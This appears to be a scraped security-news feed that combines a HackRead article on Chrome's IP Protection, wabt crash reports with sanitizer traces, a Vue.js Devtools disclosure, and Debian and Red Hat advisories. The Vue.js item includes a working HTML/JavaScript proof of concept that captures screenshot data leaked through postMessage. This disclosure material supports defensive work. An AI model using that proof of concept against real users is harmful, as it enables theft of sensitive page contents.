By Waqas
The feature is called IP Protection, and it's important to note that it is not a VPN. A VPN encrypts all of a user's traffic, while IP Protection only masks their IP address.
This is a post from HackRead.com Read the original post: Google Chrome to Mask User IP Addresses to Protect Privacy

Google is apparently working on a new Chrome browser feature called IP Protection, set for release in early 2024. This feature routes users’ internet traffic through a proxy server to hide their IP addresses

Google is developing a new feature for its **Chrome browser** called IP Protection, which will mask users’ IP addresses to protect their privacy. This feature is currently in development and is expected to be released to the public in early 2024.

IP Protection works by routing users’ traffic through a **proxy server**, which hides their real IP address from the websites and online services they visit. This can help prevent websites and online services from tracking users’ online activity and creating detailed profiles of them.

As seen **here**, the plan to conduct experiments was officially revealed on October 19th, along with an initial set of domains designated for proxying. Initially, requests to Google-owned domains will exclusively be directed through Google-owned proxies.

The feature can also help prevent users from being blocked from accessing websites or online services that are not available in their region.

It is worth noting that, IP Protection is an opt-in feature, therefore users will have the choice of whether or not to use it. It is also important to note that IP Protection is not a VPN. **A reliable VPN encrypts** all of a user’s traffic, while IP Protection only masks their IP address.

****Benefits of Using IP Protection****

There are several potential benefits to using IP Protection, including:

*   **Increased privacy:** IP Protection can help to protect users’ privacy from websites and online services that track users’ IP addresses. This can make it more difficult for these websites and services to create detailed profiles of users’ online activity.

*   **Improved security:** IP Protection can help to improve users’ security by preventing them from being tracked by malicious websites and online services. It can also help to prevent users from being blocked from accessing websites or online services that are not available in their region.

*   **Better performance:** In some cases, IP Protection can improve users’ internet performance by reducing the distance that their traffic has to travel.

****Potential** **Drawbacks of Using IP Protection****

There are also some potential drawbacks to using IP Protection, including:

*   **Reduced functionality:** Some websites and online services may not work properly when users are using IP Protection. This is because these websites and services may rely on users’ IP addresses to provide certain features or functionality.

*   **Increased bandwidth usage:** IP Protection can increase users’ bandwidth usage because their traffic is being routed through a proxy server.

*   **Decreased privacy:** While IP Protection can help to protect users’ privacy from websites and online services, it is important to note that the proxy servers used by IP Protection are operated by Google. This means that Google will be able to see users’ traffic, even if it is masked.

Overall, IP Protection is a promising new feature that can help to improve users’ privacy and security online. However, it is important to be aware of the potential drawbacks before using it.

****IP Protection as a Step Towards a More Privacy-Respecting Web****

IP Protection is just one of many steps that Google and other tech companies are taking to make the web more privacy-respecting. Other initiatives include phasing out third-party cookies and limiting fingerprinting, a feature that was introduced in the Mozilla Firefox browser **back in 2019**.

These initiatives are important because the web has become increasingly invasive in recent years. Websites and online services often collect vast amounts of data about users, including their IP addresses, browsing history, and purchase history. This data is then used to track users across the web and **target them with advertising**.

IP Protection and other privacy-enhancing features can help to give users more control over their privacy online. By masking users’ IP addresses and limiting fingerprinting, these features can make it more difficult for websites and online services to track users and create detailed profiles of them.

As more and more users adopt privacy-enhancing features, the web will become a more private place for everyone. This is a positive development for users and for the internet as a whole.

****_RELATED ARTICLES_****

1.  Google Makes Passkeys Default for All Users
2.  What is an OSINT Tool – Best OSINT Tools 2023
3.  Google offers Dark Web monitoring for US Gmail users
4.  Google’s Latest Android Feature Drop: Dark Web Search for Gmail ID
5.  Encrypted Email Service ProtonMail Now Supports Physical Security Keys

Google Chrome to Mask User IP Addresses to Protect Privacy

WebAssembly wabt 1.0.33 has an Out-of-Bound Memory Read in in DataSegment::IsValidRange(), which lead to segmentation fault.

**Environment**

OS               : Linux 5.10.16.3-microsoft-standard-WSL2 #1 SMP Fri Apr 2 22:23:49 UTC 2021 x86\_64 x86\_64 x86\_64 GNU/Linux
Commit           : 0e78c24fd231d5ee67ccd271bfa317faa963281c
Version          : 1.0.33 (git~1.0.33-35-gdddc03d3)
Clang Verison    : 12.0.1
Build            : mkdir build && cd build && export CC=clang CXX=clang++ CFLAGS="\-fsanitize=address -g" CXXFLAGS="\-fsanitize=address -g" && cmake .. && cmake --build .
Affected Tool    : wasm-interp
Enabled Features : None
Impact           : Out-of-Bound Memory Read Access

**Proof of Concept**

poc-wasm-interp-01.zip

**Stack Trace Provide By AddressSanitizer**

$  ~/wabt\_asan/bin/wasm-interp poc.wasm
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3549==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x00000064a0fe bp 0x7ffcceb61670 sp 0x7ffcceb61640 T0)
==3549==The signal is caused by a READ memory access.
==3549==Hint: address points to the zero page.
    #0 0x64a0fe in wabt::interp::DataSegment::IsValidRange(unsigned long, unsigned long) const /home/lain/wabt\_asan/src/interp/interp.cc:734:19
    #1 0x649cd7 in wabt::interp::Memory::Init(unsigned long, wabt::interp::DataSegment const&, unsigned long, unsigned long) /home/lain/wabt\_asan/src/interp/interp.cc:617:11
    #2 0x666cb4 in wabt::interp::Thread::DoMemoryInit(wabt::interp::Instr, wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:2075:3
    #3 0x65b199 in wabt::interp::Thread::StepInternal(wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:1510:32
    #4 0x65352b in wabt::interp::Thread::Run(int, wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:1086:19
    #5 0x645a70 in wabt::interp::Thread::Run(wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:1078:14
    #6 0x644caf in wabt::interp::DefinedFunc::DoCall(wabt::interp::Thread&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> > const&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> >&, wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:428:19
    #7 0x64417d in wabt::interp::Func::Call(wabt::interp::Store&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> > const&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> >&, wabt::interp::RefPtr<wabt::interp::Trap>\*, wabt::Stream\*) /home/lain/wabt\_asan/src/interp/interp.cc:394:10
    #8 0x6512e6 in wabt::interp::Instance::Instantiate(wabt::interp::Store&, wabt::interp::Ref, std::vector<wabt::interp::Ref, std::allocator<wabt::interp::Ref> > const&, wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:944:22
    #9 0x5693e5 in InstantiateModule(std::vector<wabt::interp::Ref, std::allocator<wabt::interp::Ref> >&, wabt::interp::RefPtr<wabt::interp::Module> const&, wabt::interp::RefPtr<wabt::interp::Instance>\*) /home/lain/wabt\_asan/src/tools/wasm-interp.cc:340:19
    #10 0x562e82 in ReadAndRunModule(char const\*) /home/lain/wabt\_asan/src/tools/wasm-interp.cc:423:3
    #11 0x561f67 in ProgramMain(int, char\*\*) /home/lain/wabt\_asan/src/tools/wasm-interp.cc:450:25
    #12 0x563191 in main /home/lain/wabt\_asan/src/tools/wasm-interp.cc:456:10
    #13 0x7f9f8fa00082 in \_\_libc\_start\_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
    #14 0x4845ed in \_start (/home/lain/wabt\_asan/bin/wasm-interp+0x4845ed)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/lain/wabt\_asan/src/interp/interp.cc:734:19 in wabt::interp::DataSegment::IsValidRange(unsigned long, unsigned long) const
==3549==ABORTING

CVE-2023-46331: Out-of-Bound Memory Read in DataSegment::IsValidRange() · Issue #2310 · WebAssembly/wabt

WebAssembly wabt 1.0.33 contains an Out-of-Bound Memory Write in DataSegment::Drop(), which lead to segmentation fault.

**Environment**

OS               : Linux 5.10.16.3-microsoft-standard-WSL2 #1 SMP Fri Apr 2 22:23:49 UTC 2021 x86\_64 x86\_64 x86\_64 GNU/Linux
Commit           : 0e78c24fd231d5ee67ccd271bfa317faa963281c
Version          : 1.0.33 (git~1.0.33-35-gdddc03d3)
Clang Verison    : 12.0.1
Build            : mkdir build && cd build && export CC=clang CXX=clang++ CFLAGS="\-fsanitize=address -g" CXXFLAGS="\-fsanitize=address -g" && cmake .. && cmake --build .
Affected Tool    : wasm-interp
Enabled Features : None
Impact           : Out-of-Bound Memory Write Access

**Proof of Concept**

poc-wasm-interp-02.zip

**Stack Trace Provide By AddressSanitizer**

$  ~/wabt\_asan/bin/wasm-interp poc.wasm
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3641==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x00000067f426 bp 0x7ffd04e28310 sp 0x7ffd04e28300 T0)
==3641==The signal is caused by a WRITE memory access.
==3641==Hint: address points to the zero page.
    #0 0x67f426 in wabt::interp::DataSegment::Drop() /home/lain/wabt\_asan/include/wabt/interp/interp-inl.h:906:9
    #1 0x6670be in wabt::interp::Thread::DoDataDrop(wabt::interp::Instr) /home/lain/wabt\_asan/src/interp/interp.cc:2081:33
    #2 0x65b29a in wabt::interp::Thread::StepInternal(wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:1511:32
    #3 0x65352b in wabt::interp::Thread::Run(int, wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:1086:19
    #4 0x645a70 in wabt::interp::Thread::Run(wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:1078:14
    #5 0x644caf in wabt::interp::DefinedFunc::DoCall(wabt::interp::Thread&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> > const&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> >&, wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:428:19
    #6 0x64417d in wabt::interp::Func::Call(wabt::interp::Store&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> > const&, std::vector<wabt::interp::Value, std::allocator<wabt::interp::Value> >&, wabt::interp::RefPtr<wabt::interp::Trap>\*, wabt::Stream\*) /home/lain/wabt\_asan/src/interp/interp.cc:394:10
    #7 0x6512e6 in wabt::interp::Instance::Instantiate(wabt::interp::Store&, wabt::interp::Ref, std::vector<wabt::interp::Ref, std::allocator<wabt::interp::Ref> > const&, wabt::interp::RefPtr<wabt::interp::Trap>\*) /home/lain/wabt\_asan/src/interp/interp.cc:944:22
    #8 0x5693e5 in InstantiateModule(std::vector<wabt::interp::Ref, std::allocator<wabt::interp::Ref> >&, wabt::interp::RefPtr<wabt::interp::Module> const&, wabt::interp::RefPtr<wabt::interp::Instance>\*) /home/lain/wabt\_asan/src/tools/wasm-interp.cc:340:19
    #9 0x562e82 in ReadAndRunModule(char const\*) /home/lain/wabt\_asan/src/tools/wasm-interp.cc:423:3
    #10 0x561f67 in ProgramMain(int, char\*\*) /home/lain/wabt\_asan/src/tools/wasm-interp.cc:450:25
    #11 0x563191 in main /home/lain/wabt\_asan/src/tools/wasm-interp.cc:456:10
    #12 0x7f77c7bdc082 in \_\_libc\_start\_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
    #13 0x4845ed in \_start (/home/lain/wabt\_asan/bin/wasm-interp+0x4845ed)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/lain/wabt\_asan/include/wabt/interp/interp-inl.h:906:9 in wabt::interp::DataSegment::Drop()
==3641==ABORTING

CVE-2023-46332: Out-of-Bound Memory Write in DataSegment::Drop() · Issue #2311 · WebAssembly/wabt

The Vue.js Devtools extension was found to leak screenshot data back to a malicious web page via the standard `postMessage()` API. By creating a malicious web page with an iFrame targeting a sensitive resource (i.e. a locally accessible file or sensitive website), and registering a listener on the web page, the extension sent messages back to the listener, containing the base64 encoded screenshot data of the sensitive resource.

**Disclosure Status**

I have disclosed this to the maintainer, who issued a fix (by disabling the screenshot functionality by default) in version 6.5.1

**Commits**

https://github.com/vuejs/devtools/releases/tag/v6.5.1

https://github.com/vuejs/devtools/commit/3444bdd8

**Technical Details:**

The Vue.js Devtools extension was found to leak screenshot data back to a malicious web page via the standard postMessage() API. By creating a malicious web page with an iFrame targeting a sensitive resource (i.e. a locally accessible file or sensitive website), and registering a listener on the web page, the extension sent messages back to the listener, containing the base64 encoded screenshot data of the sensitive resource.

Some user interaction was required, as the messages containing screenshot data were only sent when the victim hovered over the timeline bars in the timeline tab (see below)

Some mitigations exist in terms of the website that can be targeted by the malicious web page, as the target site must allow being embedded within iFrames (i.e. the X-Frame-Options HTTP response header must not be present or must explicitly allow the target site). However, it was found that other tabs with the Vue.js devtools extension active also leaked screenshot data back to the malicious web page, increasing the chance of sensitive information disclosure.

The code below shows how the extension uses a wildcard in the postMessage() function call (\*) to send the messages back to the web page listeners, which is why screenshot data from separate tabs can be leaked.

const bridge \= new Bridge({
  listen (fn) {
    window.addEventListener('message', evt \=> fn(evt.data))
  },
  send (data) {
    if (process.env.NODE\_ENV !== 'production') {
      console.log('%cbackend -> devtools', 'color:#888;', data)
    }
    window.parent.postMessage(data, '\*')
  },
})

**PoC**

In the proof-of-concept Vue.js application below, the standard window.addEventListener(‘message’ <listener>) API is used to register a listener on the malicious web page. The setInterval() function is used to regularly simulate clicks on the PoC page, as these (mouse, keyboard etc) events are what trigger the page capture APIs to generate screenshot data. The handleScreenshot() function checks each incoming message for the expected parameters and converts the incoming base64 encoded screenshot data into an image, which is embedded into the PoC page. In reality, the base64 data would probably be silently exfiltrated to a malicious backend server.

<!DOCTYPE html\>
<html lang\="en"\>
<head\>
    <meta charset\="UTF-8"\>
    <title\>postMessage() PoC</title\>
    <script src\="https://unpkg.com/vue@3/dist/vue.global.js"\></script\>
</head\>
<body\>
    <div id\="app"\>
        <iframe src\="https://www.wikipedia.org" style\="position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden;"\></iframe\>
    </div\>
    <script\>
        const { createApp, ref } \= Vue

        createApp({
            setup() {
                const message \= ref('Hello vue!')
                return {
                    message
                }
            }
        }).mount('#app')
    </script\>

    <script\>
        function dummyClick() {
            console.log('Simulating click on PoC page..')
            document.body.click();
        }

        function listenForMsg() {
            window.addEventListener("message", (msg) \=> {
                console.log(\`Got message in PoC page (window.addEventListener): ${JSON.stringify(msg.data)}\`);
                handleScreenshot(msg.data);
            });
            console.log(\`Added message listener (window.addEventListener)..\`);
        }

        function handleScreenshot(data) {
            if (data.payload && data.payload.length \> 0) {
                data.payload.forEach((event) \=> {
                    if (event.event \=== 'b:timeline:show-screenshot' && event.payload.screenshot) {
                        console.log(\`Got screenshot with id: ${event.payload.screenshot.id}\`);
                        let img \= new Image();
                        img.src \= event.payload.screenshot.image;
                        document.body.append(img);
                    }
                }, null);
            }
        }

        listenForMsg();
        setInterval(dummyClick, 1500);
    </script\>
</body\>
</html\>

CVE-2023-5718: Vuejs Dev Tools v6.5.0 Sensitive Information Leaked to Malicious Web Page

Frappe is a full-stack web application framework that uses Python and MariaDB on the server side and an integrated client side library. A malicious Frappe user with desk access could create documents containing HTML payloads allowing HTML Injection. This vulnerability has been patched in version 14.49.0.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-46127: refactor: escape instead of sanitizing HTML by ankush · Pull Request #22339 · frappe/frappe

Debian Linux Security Advisory 5531-1 - It was discovered that roundcube, a skinnable AJAX based webmail solution for IMAP servers, did not properly sanitize HTML messages. This would allow an attacker to load arbitrary JavaScript code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5531-1                   security@debian.orghttps://www.debian.org/security/                       Sebastien DelafondOctober 23, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : roundcubeCVE ID         : CVE-2023-5631Debian Bug     : 1054079It was discovered that roundcube, a skinnable AJAX based webmailsolution for IMAP servers, did not properly sanitize HTMLmessages. This would allow an attacker to load arbitrary JavaScriptcode.For the oldstable distribution (bullseye), this problem has been fixedin version 1.4.15+dfsg.1-1~deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 1.6.4+dfsg-1~deb12u1.We recommend that you upgrade your roundcube packages.For the detailed security status of roundcube please refer toits security tracker page at:https://security-tracker.debian.org/tracker/roundcubeFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAmU2FhEACgkQEL6Jg/PVnWTgbQf/T08r3SQ/NFUpzs1/8k+euPOyysNFnW7JZ1LcI+ug5iF8RrdEVVuURZHK7i/SuRNomgEQbUyVpgSb9rb6z5qkc0k6gbfh2+KMRk0ViHhG1+tuEe1O99abXt+5LUQNtXWVMAniWWdbtdQeCBHWgxMpstarWq4akgCnx1Dj7Tj8PyX05+bYFpR79WMqCKypX4lz1kP8U3U5c0tPDi/zjuzGT1IvVSyWPesaNHzmD4ZMr9A/dcDBtxQ+kTaPN3GVPJoDG9TVOcHQTqcb2MmTQY5FtvQswVCXiEsugbmgOQ4wiUYlV90C8s4ALSxBBiv+mOUCKZH/mNNjNeHKADW+nOkOeg===TSzb-----END PGP SIGNATURE-----

Debian Security Advisory 5531-1

Debian Linux Security Advisory 5530-1 - Several vulnerabilities were discovered in ruby-rack, a modular Ruby webserver interface, which may result in denial of service and shell escape sequence injection.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5530-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoOctober 22, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ruby-rackCVE ID         : CVE-2022-30122 CVE-2022-30123 CVE-2022-44570 CVE-2022-44571                 CVE-2022-44572 CVE-2023-27530 CVE-2023-27539Debian Bug     : 1029832 1032803 1033264Several vulnerabilities were discovered in ruby-rack, a modular Rubywebserver interface, which may result in denial of service and shellescape sequence injection.For the oldstable distribution (bullseye), these problems have been fixedin version 2.1.4-3+deb11u1.We recommend that you upgrade your ruby-rack packages.For the detailed security status of ruby-rack please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/ruby-rackFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmU1FpxfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0SAig/+MS3miFMErKy2l1DjwlzjchJC0cyfMHdVn1mpWZMd3iRVuKqqhRt/GlLSXYFRaU6loJ69WqZGLdnDJtKiOUkJPip5BIL2EZccYdg7nDkvvXs6ATffnC11B/SnJ0N7YAYubtyE/924H+mLh+rpx5sMkmGWHKGssQzP1e2erpBl3FRIQcWm/E1PkvZY3VmRbSluAxb3nQ6+bm+5RDNZOzPtkFQkEuGFV4BNFYqh0JWO2lKLkdG6r8+SaeBGKq5i+WtuHxYEVLB1Go6mvyymh8vDq6Mfimfas9B9SYDKjdiU3VOLoiaXEkjepdQFzSm1QVyk9aYJ6Qb5yy8hrr8XPfVuqlumF+ACpsAK1wH+WtKdiQkdZsvFpcYKn5g4q3zMa8RSoDAEnnc9AmGGdDOT/5sdosby1XAlrO7EoVGuhzKR7i1CtAdmnvABwf1dVqv3Jrn6pg+1c278vFc/n/fyXaHiPolRhr4xSxaNiT0OQ/f+ZUJg5NAT8WIS355kefSzAWVpOYB4kMM3OcWWwohkYWf6WuUoZZsIKvdE8dnAhV6NYaChrS6wA3fiLoQu0U9m+4jdB0IDLy+uffIzYCfeFepyq/Gg8e6TIx/T8Rf1uX8VFAvqiBXc3oIlGQMfaulmQel8mGBXceLIMU+Ze0kRmMf3j5JLWotnKRFNDHAW11U2OWU==tPF2-----END PGP SIGNATURE-----

Debian Security Advisory 5530-1

Red Hat Security Advisory 2023-5982-01 - An update for foreman_ygg_worker, puppet-agent, qpid-proton, and yggdrasil is now available for Satellite Client 6 for RHEL 6, Satellite Client 6 for RHEL 7, Satellite Client 6 for RHEL 8, and Satellite Client 6 for RHEL 9. Issues addressed include code execution and denial of service vulnerabilities.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5982.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat Satellite Client security and bug fix updateAdvisory ID:        RHSA-2023:5982-01Product:            Red Hat Satellite ClientAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:5982Issue date:         2023-10-20Revision:           01CVE Names:          CVE-2022-1292====================================================================Summary: An update for foreman_ygg_worker, puppet-agent, qpid-proton, and yggdrasil is now available for Satellite Client 6 for RHEL 6, Satellite Client 6 for RHEL 7, Satellite Client 6 for RHEL 8, and Satellite Client 6 for RHEL 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Security Fix(es):* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) (CVE-2023-39325)* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)* openssl: c_rehash script allows command injection (CVE-2022-1292)* openssl: the c_rehash script allows command injection (CVE-2022-2068)* golang: net/http: excessive memory growth in a Go server accepting HTTP/2 requests (CVE-2022-41717)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fix(es):* Katello Agent / Goferd Service CLOSE_WAIT Connections on RHEL8 Clients (BZ#2184996)* Not possible to configure the temporary directory to be used on clients by remote execution in pull mode (BZ#2217079)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2022-1292References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/documentation/en-us/red_hat_satellite/6.13/html/upgrading_and_updating_red_hat_satellite/indexhttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Red Hat Security Advisory 2023-5982-01

Red Hat Security Advisory 2023-5980-01 - Updated Satellite 6.11 packages that fix several bugs are now available for Red Hat Satellite. Issues addressed include code execution and denial of service vulnerabilities.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5980.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Satellite 6.11.5.6 async security update  
Advisory ID:        RHSA-2023:5980-01  
Product:            Red Hat Satellite 6  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:5980  
Issue date:         2023-10-20  
Revision:           01  
CVE Names:          CVE-2022-1292  
====================================================================

Summary: 

Updated Satellite 6.11 packages that fix several bugs are now available for Red Hat Satellite.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat Satellite is a system management solution that allows organizations to configure and maintain their systems without the necessity to provide public Internet access to their servers or other client systems. It performs provisioning and configuration management of predefined standard operating environments.

Security fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (Rapid Reset) (CVE-2023-39325)

* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset) (CVE-2023-44487)

A Red Hat Security Bulletin which addresses further details about the Rapid Reset flaws is available in the References section.

* ruby-git: code injection vulnerability (CVE-2022-46648)

* ruby-git: code injection vulnerability (CVE-2022-47318)

* Foreman: Arbitrary code execution through templates (CVE-2023-0118)

* Satellite/Foreman: Arbitrary code execution through yaml global parameters (CVE-2023-0462)

* openssl: c_rehash script allows command injection (CVE-2022-1292)

* openssl: the c_rehash script allows command injection (CVE-2022-2068)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

This update fixes the following bugs:

2159417 - CVE-2023-0118 foreman: Arbitrary code execution through templates [rhn_satellite_6.11]  
2163523 - CVE-2023-0462 foreman: Satellite/Foreman: Arbitrary code execution through yaml global parameters [rhn_satellite_6.11]  
2242355 - CVE-2022-1292 CVE-2022-2068 puppet-agent for Satellite and Capsule: various flaws [rhn_satellite_6.11]  
2242360 - CVE-2022-47318 tfm-rubygem-git: ruby-git: code injection vulnerability [rhn_satellite_6.11]  
2242364 - CVE-2022-46648 rubygem-git: ruby-git: code injection vulnerability [rhn_satellite_6.11]  
2243832 - [Major Incident] CVE-2023-39325 CVE-2023-44487 yggdrasil-worker-forwarder: various flaws [rhn_satellite_6.11] 

Users of Red Hat Satellite are advised to upgrade to these updated packages,  
which fix these bugs.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-1292

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://access.redhat.com/documentation/en-us/red_hat_satellite/6.11/html-single/upgrading_and_updating_red_hat_satellite/index#updating_satellite

Red Hat Security Advisory 2023-5980-01

Red Hat Security Advisory 2023-5978-01 - JBoss EAP XP 4.0.0.GA security release on the EAP 7.4.13 base is now available. See references for release notes. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5978.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat JBoss EAP 7.4.13 XP 4.0.0.GA security releaseAdvisory ID:        RHSA-2023:5978-01Product:            Red Hat JBoss Enterprise Application PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:5978Issue date:         2023-10-20Revision:           01CVE Names:          CVE-2023-44487====================================================================Summary: JBoss EAP XP 4.0.0.GA security release on the EAP 7.4.13 base is now available. See references for release notes.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This asynchronous patch is a security update zip for the JBoss EAP XP 4.0.0 runtime distribution for use with EAP 7.4.13.Security Fix(es):* undertow/netty-codec-http2: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (CVE-2023-44487)A Red Hat Security Bulletin which addresses further details about the Rapid Reset flaw is available in the References section.For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2023-44487References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/red_hat_jboss_eap_xp_4.0.0_release_notes/indexhttps://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/jboss_eap_xp_4.0_upgrade_and_migration_guide/indexhttps://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/using_jboss_eap_xp_4.0.0/index

Tag

#web